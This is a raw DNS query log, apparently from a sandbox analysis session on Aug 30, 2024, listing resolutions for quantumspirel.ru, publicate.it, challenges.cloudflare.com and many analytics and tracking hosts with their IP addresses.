                                                                                                                                                                                                        Aug 30, 2024 18:16:16.371368885 CEST1.1.1.1192.168.2.50x455bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.456770897 CEST1.1.1.1192.168.2.50x27fdNo error (0)quantumspirel.ru172.67.187.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.456770897 CEST1.1.1.1192.168.2.50x27fdNo error (0)quantumspirel.ru104.21.19.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.526094913 CEST1.1.1.1192.168.2.50xe78bNo error (0)quantumspirel.ru65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:17.232387066 CEST1.1.1.1192.168.2.50xb6edNo error (0)publicate.it104.26.8.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:17.232387066 CEST1.1.1.1192.168.2.50xb6edNo error (0)publicate.it172.67.69.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:17.232387066 CEST1.1.1.1192.168.2.50xb6edNo error (0)publicate.it104.26.9.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:17.233531952 CEST1.1.1.1192.168.2.50x182dNo error (0)publicate.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.698179007 CEST1.1.1.1192.168.2.50x134aNo error (0)publicate.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.698326111 CEST1.1.1.1192.168.2.50x8835No error (0)publicate.it104.26.8.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.698326111 CEST1.1.1.1192.168.2.50x8835No error (0)publicate.it104.26.9.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:18.698326111 CEST1.1.1.1192.168.2.50x8835No error (0)publicate.it172.67.69.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.006695032 CEST1.1.1.1192.168.2.50xfa9dNo error (0)d3e54v103j8qbb.cloudfront.net3.161.127.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.006695032 CEST1.1.1.1192.168.2.50xfa9dNo error (0)d3e54v103j8qbb.cloudfront.net3.161.127.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.006695032 CEST1.1.1.1192.168.2.50xfa9dNo error (0)d3e54v103j8qbb.cloudfront.net3.161.127.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.006695032 CEST1.1.1.1192.168.2.50xfa9dNo error (0)d3e54v103j8qbb.cloudfront.net3.161.127.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.007627010 CEST1.1.1.1192.168.2.50xb102No error (0)platform-api.sharethis.com3.160.212.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.007627010 CEST1.1.1.1192.168.2.50xb102No error (0)platform-api.sharethis.com3.160.212.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.007627010 CEST1.1.1.1192.168.2.50xb102No error (0)platform-api.sharethis.com3.160.212.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.007627010 CEST1.1.1.1192.168.2.50xb102No error (0)platform-api.sharethis.com3.160.212.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.010894060 CEST1.1.1.1192.168.2.50x774cNo error (0)js.hs-scripts.com104.16.141.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.010894060 CEST1.1.1.1192.168.2.50x774cNo error (0)js.hs-scripts.com104.16.139.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.010894060 CEST1.1.1.1192.168.2.50x774cNo error (0)js.hs-scripts.com104.16.137.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.010894060 CEST1.1.1.1192.168.2.50x774cNo error (0)js.hs-scripts.com104.16.140.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.010894060 CEST1.1.1.1192.168.2.50x774cNo error (0)js.hs-scripts.com104.16.138.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.011549950 CEST1.1.1.1192.168.2.50x41fdNo error (0)js.hs-scripts.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.099596977 CEST1.1.1.1192.168.2.50xcab9No error (0)sc.lfeeder.comdja7ygzgr04yk.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.099596977 CEST1.1.1.1192.168.2.50xcab9No error (0)dja7ygzgr04yk.cloudfront.net18.239.83.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.099596977 CEST1.1.1.1192.168.2.50xcab9No error (0)dja7ygzgr04yk.cloudfront.net18.239.83.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.099596977 CEST1.1.1.1192.168.2.50xcab9No error (0)dja7ygzgr04yk.cloudfront.net18.239.83.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.099596977 CEST1.1.1.1192.168.2.50xcab9No error (0)dja7ygzgr04yk.cloudfront.net18.239.83.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.112428904 CEST1.1.1.1192.168.2.50xd35eNo error (0)static.woopra.comn.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.113260984 CEST1.1.1.1192.168.2.50xe83bNo error (0)static.woopra.comn.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.115995884 CEST1.1.1.1192.168.2.50x6b6fNo error (0)sc.lfeeder.comdja7ygzgr04yk.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.501892090 CEST1.1.1.1192.168.2.50xdd13No error (0)quantumspirel.ru65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.534276962 CEST1.1.1.1192.168.2.50xe109No error (0)quantumspirel.ru172.67.187.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:19.534276962 CEST1.1.1.1192.168.2.50xe109No error (0)quantumspirel.ru104.21.19.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.168584108 CEST1.1.1.1192.168.2.50xd27aNo error (0)www.woopra.com5.9.73.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.252294064 CEST1.1.1.1192.168.2.50xd0c7No error (0)static.woopra.comn.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.252571106 CEST1.1.1.1192.168.2.50xfa74No error (0)static.woopra.comn.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.719974041 CEST1.1.1.1192.168.2.50xdb51No error (0)tr-rc.lfeeder.com18.239.83.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.719974041 CEST1.1.1.1192.168.2.50xdb51No error (0)tr-rc.lfeeder.com18.239.83.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.719974041 CEST1.1.1.1192.168.2.50xdb51No error (0)tr-rc.lfeeder.com18.239.83.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.719974041 CEST1.1.1.1192.168.2.50xdb51No error (0)tr-rc.lfeeder.com18.239.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.798136950 CEST1.1.1.1192.168.2.50x779aNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.798295975 CEST1.1.1.1192.168.2.50xaa8dNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.799911022 CEST1.1.1.1192.168.2.50x553fNo error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.800260067 CEST1.1.1.1192.168.2.50x6ae6No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.800260067 CEST1.1.1.1192.168.2.50x6ae6No error (0)static-cdn.hotjar.com18.239.94.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.800260067 CEST1.1.1.1192.168.2.50x6ae6No error (0)static-cdn.hotjar.com18.239.94.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.800260067 CEST1.1.1.1192.168.2.50x6ae6No error (0)static-cdn.hotjar.com18.239.94.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.800260067 CEST1.1.1.1192.168.2.50x6ae6No error (0)static-cdn.hotjar.com18.239.94.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.802664995 CEST1.1.1.1192.168.2.50x385eNo error (0)assets.getalvis.com104.21.84.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.802664995 CEST1.1.1.1192.168.2.50x385eNo error (0)assets.getalvis.com172.67.187.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:20.808960915 CEST1.1.1.1192.168.2.50x54b7No error (0)assets.getalvis.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:22.166284084 CEST1.1.1.1192.168.2.50xe57bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:22.166284084 CEST1.1.1.1192.168.2.50xe57bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:22.166284084 CEST1.1.1.1192.168.2.50xe57bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:22.166284084 CEST1.1.1.1192.168.2.50xe57bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.178927898 CEST1.1.1.1192.168.2.50xf297No error (0)analytics.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.184573889 CEST1.1.1.1192.168.2.50xbcc8No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.189395905 CEST1.1.1.1192.168.2.50x7ea1No error (0)stats.g.doubleclick.net74.125.133.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.189395905 CEST1.1.1.1192.168.2.50x7ea1No error (0)stats.g.doubleclick.net74.125.133.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.189395905 CEST1.1.1.1192.168.2.50x7ea1No error (0)stats.g.doubleclick.net74.125.133.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.189395905 CEST1.1.1.1192.168.2.50x7ea1No error (0)stats.g.doubleclick.net74.125.133.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.413270950 CEST1.1.1.1192.168.2.50x8f81No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.413270950 CEST1.1.1.1192.168.2.50x8f81No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.414246082 CEST1.1.1.1192.168.2.50x75bbNo error (0)public.profitwell.comdna8twue3dlxq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.414906979 CEST1.1.1.1192.168.2.50x8fb1No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.414906979 CEST1.1.1.1192.168.2.50x8fb1No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.414906979 CEST1.1.1.1192.168.2.50x8fb1No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.414906979 CEST1.1.1.1192.168.2.50x8fb1No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.431442022 CEST1.1.1.1192.168.2.50xaf41No error (0)public.profitwell.comdna8twue3dlxq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.431442022 CEST1.1.1.1192.168.2.50xaf41No error (0)dna8twue3dlxq.cloudfront.net3.165.190.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.431442022 CEST1.1.1.1192.168.2.50xaf41No error (0)dna8twue3dlxq.cloudfront.net3.165.190.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.431442022 CEST1.1.1.1192.168.2.50xaf41No error (0)dna8twue3dlxq.cloudfront.net3.165.190.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.431442022 CEST1.1.1.1192.168.2.50xaf41No error (0)dna8twue3dlxq.cloudfront.net3.165.190.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.481355906 CEST1.1.1.1192.168.2.50xf3d6No error (0)px.ads.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.481355906 CEST1.1.1.1192.168.2.50xf3d6No error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.481365919 CEST1.1.1.1192.168.2.50xaa80No error (0)px.ads.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.481365919 CEST1.1.1.1192.168.2.50xaa80No error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.481374979 CEST1.1.1.1192.168.2.50xf0b7No error (0)td.doubleclick.net142.250.186.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.970992088 CEST1.1.1.1192.168.2.50x6096No error (0)d3e54v103j8qbb.cloudfront.net52.222.232.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.970992088 CEST1.1.1.1192.168.2.50x6096No error (0)d3e54v103j8qbb.cloudfront.net52.222.232.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.970992088 CEST1.1.1.1192.168.2.50x6096No error (0)d3e54v103j8qbb.cloudfront.net52.222.232.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.970992088 CEST1.1.1.1192.168.2.50x6096No error (0)d3e54v103j8qbb.cloudfront.net52.222.232.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.973069906 CEST1.1.1.1192.168.2.50xc9ccNo error (0)sc.lfeeder.comdja7ygzgr04yk.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.973069906 CEST1.1.1.1192.168.2.50xc9ccNo error (0)dja7ygzgr04yk.cloudfront.net18.66.122.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.973069906 CEST1.1.1.1192.168.2.50xc9ccNo error (0)dja7ygzgr04yk.cloudfront.net18.66.122.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.973069906 CEST1.1.1.1192.168.2.50xc9ccNo error (0)dja7ygzgr04yk.cloudfront.net18.66.122.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.973069906 CEST1.1.1.1192.168.2.50xc9ccNo error (0)dja7ygzgr04yk.cloudfront.net18.66.122.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.973539114 CEST1.1.1.1192.168.2.50x679cNo error (0)sc.lfeeder.comdja7ygzgr04yk.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:23.976888895 CEST1.1.1.1192.168.2.50x8ce1No error (0)www.woopra.com5.9.57.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.043006897 CEST1.1.1.1192.168.2.50x3df4No error (0)tr-rc.lfeeder.com18.239.83.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.043006897 CEST1.1.1.1192.168.2.50x3df4No error (0)tr-rc.lfeeder.com18.239.83.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.043006897 CEST1.1.1.1192.168.2.50x3df4No error (0)tr-rc.lfeeder.com18.239.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.043006897 CEST1.1.1.1192.168.2.50x3df4No error (0)tr-rc.lfeeder.com18.239.83.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.047808886 CEST1.1.1.1192.168.2.50x3c8eNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.047919989 CEST1.1.1.1192.168.2.50x4f7dNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.048924923 CEST1.1.1.1192.168.2.50x61c3No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.049134970 CEST1.1.1.1192.168.2.50x77a9No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.049134970 CEST1.1.1.1192.168.2.50x77a9No error (0)static-cdn.hotjar.com18.239.94.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.049134970 CEST1.1.1.1192.168.2.50x77a9No error (0)static-cdn.hotjar.com18.239.94.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.049134970 CEST1.1.1.1192.168.2.50x77a9No error (0)static-cdn.hotjar.com18.239.94.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.049134970 CEST1.1.1.1192.168.2.50x77a9No error (0)static-cdn.hotjar.com18.239.94.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.049422026 CEST1.1.1.1192.168.2.50x3f28No error (0)assets.getalvis.com104.21.84.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.049422026 CEST1.1.1.1192.168.2.50x3f28No error (0)assets.getalvis.com172.67.187.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.051390886 CEST1.1.1.1192.168.2.50x7462No error (0)assets.getalvis.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.092765093 CEST1.1.1.1192.168.2.50x93No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.092765093 CEST1.1.1.1192.168.2.50x93No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.092765093 CEST1.1.1.1192.168.2.50x93No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.092765093 CEST1.1.1.1192.168.2.50x93No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.143310070 CEST1.1.1.1192.168.2.50xd485No error (0)script.hotjar.com13.227.219.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.143310070 CEST1.1.1.1192.168.2.50xd485No error (0)script.hotjar.com13.227.219.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.143310070 CEST1.1.1.1192.168.2.50xd485No error (0)script.hotjar.com13.227.219.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:24.143310070 CEST1.1.1.1192.168.2.50xd485No error (0)script.hotjar.com13.227.219.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.698587894 CEST1.1.1.1192.168.2.50x1540No error (0)www.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.698587894 CEST1.1.1.1192.168.2.50x1540No error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.698602915 CEST1.1.1.1192.168.2.50xbcf1No error (0)www.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.698602915 CEST1.1.1.1192.168.2.50xbcf1No error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.701075077 CEST1.1.1.1192.168.2.50x416cNo error (0)px.ads.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.701075077 CEST1.1.1.1192.168.2.50x416cNo error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.701102972 CEST1.1.1.1192.168.2.50xead6No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.701102972 CEST1.1.1.1192.168.2.50xead6No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.701102972 CEST1.1.1.1192.168.2.50xead6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.701102972 CEST1.1.1.1192.168.2.50xead6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.702408075 CEST1.1.1.1192.168.2.50xcf70No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.702408075 CEST1.1.1.1192.168.2.50xcf70No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.702728987 CEST1.1.1.1192.168.2.50xdf24No error (0)px.ads.linkedin.comexp1.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.702728987 CEST1.1.1.1192.168.2.50xdf24No error (0)exp1.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.874399900 CEST1.1.1.1192.168.2.50xf4fdNo error (0)t.clarity.msclarity-ingest-eus2-c-sc.eastus2.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:25.875585079 CEST1.1.1.1192.168.2.50x5ac0No error (0)t.clarity.msclarity-ingest-eus2-c-sc.eastus2.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.301289082 CEST1.1.1.1192.168.2.50x3529No error (0)public.profitwell.comdna8twue3dlxq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.302391052 CEST1.1.1.1192.168.2.50x3be3No error (0)public.profitwell.comdna8twue3dlxq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.302391052 CEST1.1.1.1192.168.2.50x3be3No error (0)dna8twue3dlxq.cloudfront.net18.239.83.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.302391052 CEST1.1.1.1192.168.2.50x3be3No error (0)dna8twue3dlxq.cloudfront.net18.239.83.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.302391052 CEST1.1.1.1192.168.2.50x3be3No error (0)dna8twue3dlxq.cloudfront.net18.239.83.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:26.302391052 CEST1.1.1.1192.168.2.50x3be3No error (0)dna8twue3dlxq.cloudfront.net18.239.83.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379137993 CEST1.1.1.1192.168.2.50xcfc1No error (0)widget.intercom.io18.239.83.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379137993 CEST1.1.1.1192.168.2.50xcfc1No error (0)widget.intercom.io18.239.83.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379137993 CEST1.1.1.1192.168.2.50xcfc1No error (0)widget.intercom.io18.239.83.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379137993 CEST1.1.1.1192.168.2.50xcfc1No error (0)widget.intercom.io18.239.83.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379584074 CEST1.1.1.1192.168.2.50x6b05No error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379584074 CEST1.1.1.1192.168.2.50x6b05No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379743099 CEST1.1.1.1192.168.2.50xfc2eNo error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:27.379743099 CEST1.1.1.1192.168.2.50xfc2eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.407247066 CEST1.1.1.1192.168.2.50x6286No error (0)js.intercomcdn.com18.239.94.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.407247066 CEST1.1.1.1192.168.2.50x6286No error (0)js.intercomcdn.com18.239.94.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.407247066 CEST1.1.1.1192.168.2.50x6286No error (0)js.intercomcdn.com18.239.94.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.407247066 CEST1.1.1.1192.168.2.50x6286No error (0)js.intercomcdn.com18.239.94.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.665394068 CEST1.1.1.1192.168.2.50x45c6No error (0)widget.intercom.io18.239.83.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.665394068 CEST1.1.1.1192.168.2.50x45c6No error (0)widget.intercom.io18.239.83.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.665394068 CEST1.1.1.1192.168.2.50x45c6No error (0)widget.intercom.io18.239.83.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:29.665394068 CEST1.1.1.1192.168.2.50x45c6No error (0)widget.intercom.io18.239.83.59A (IP address)IN (0x0001)false
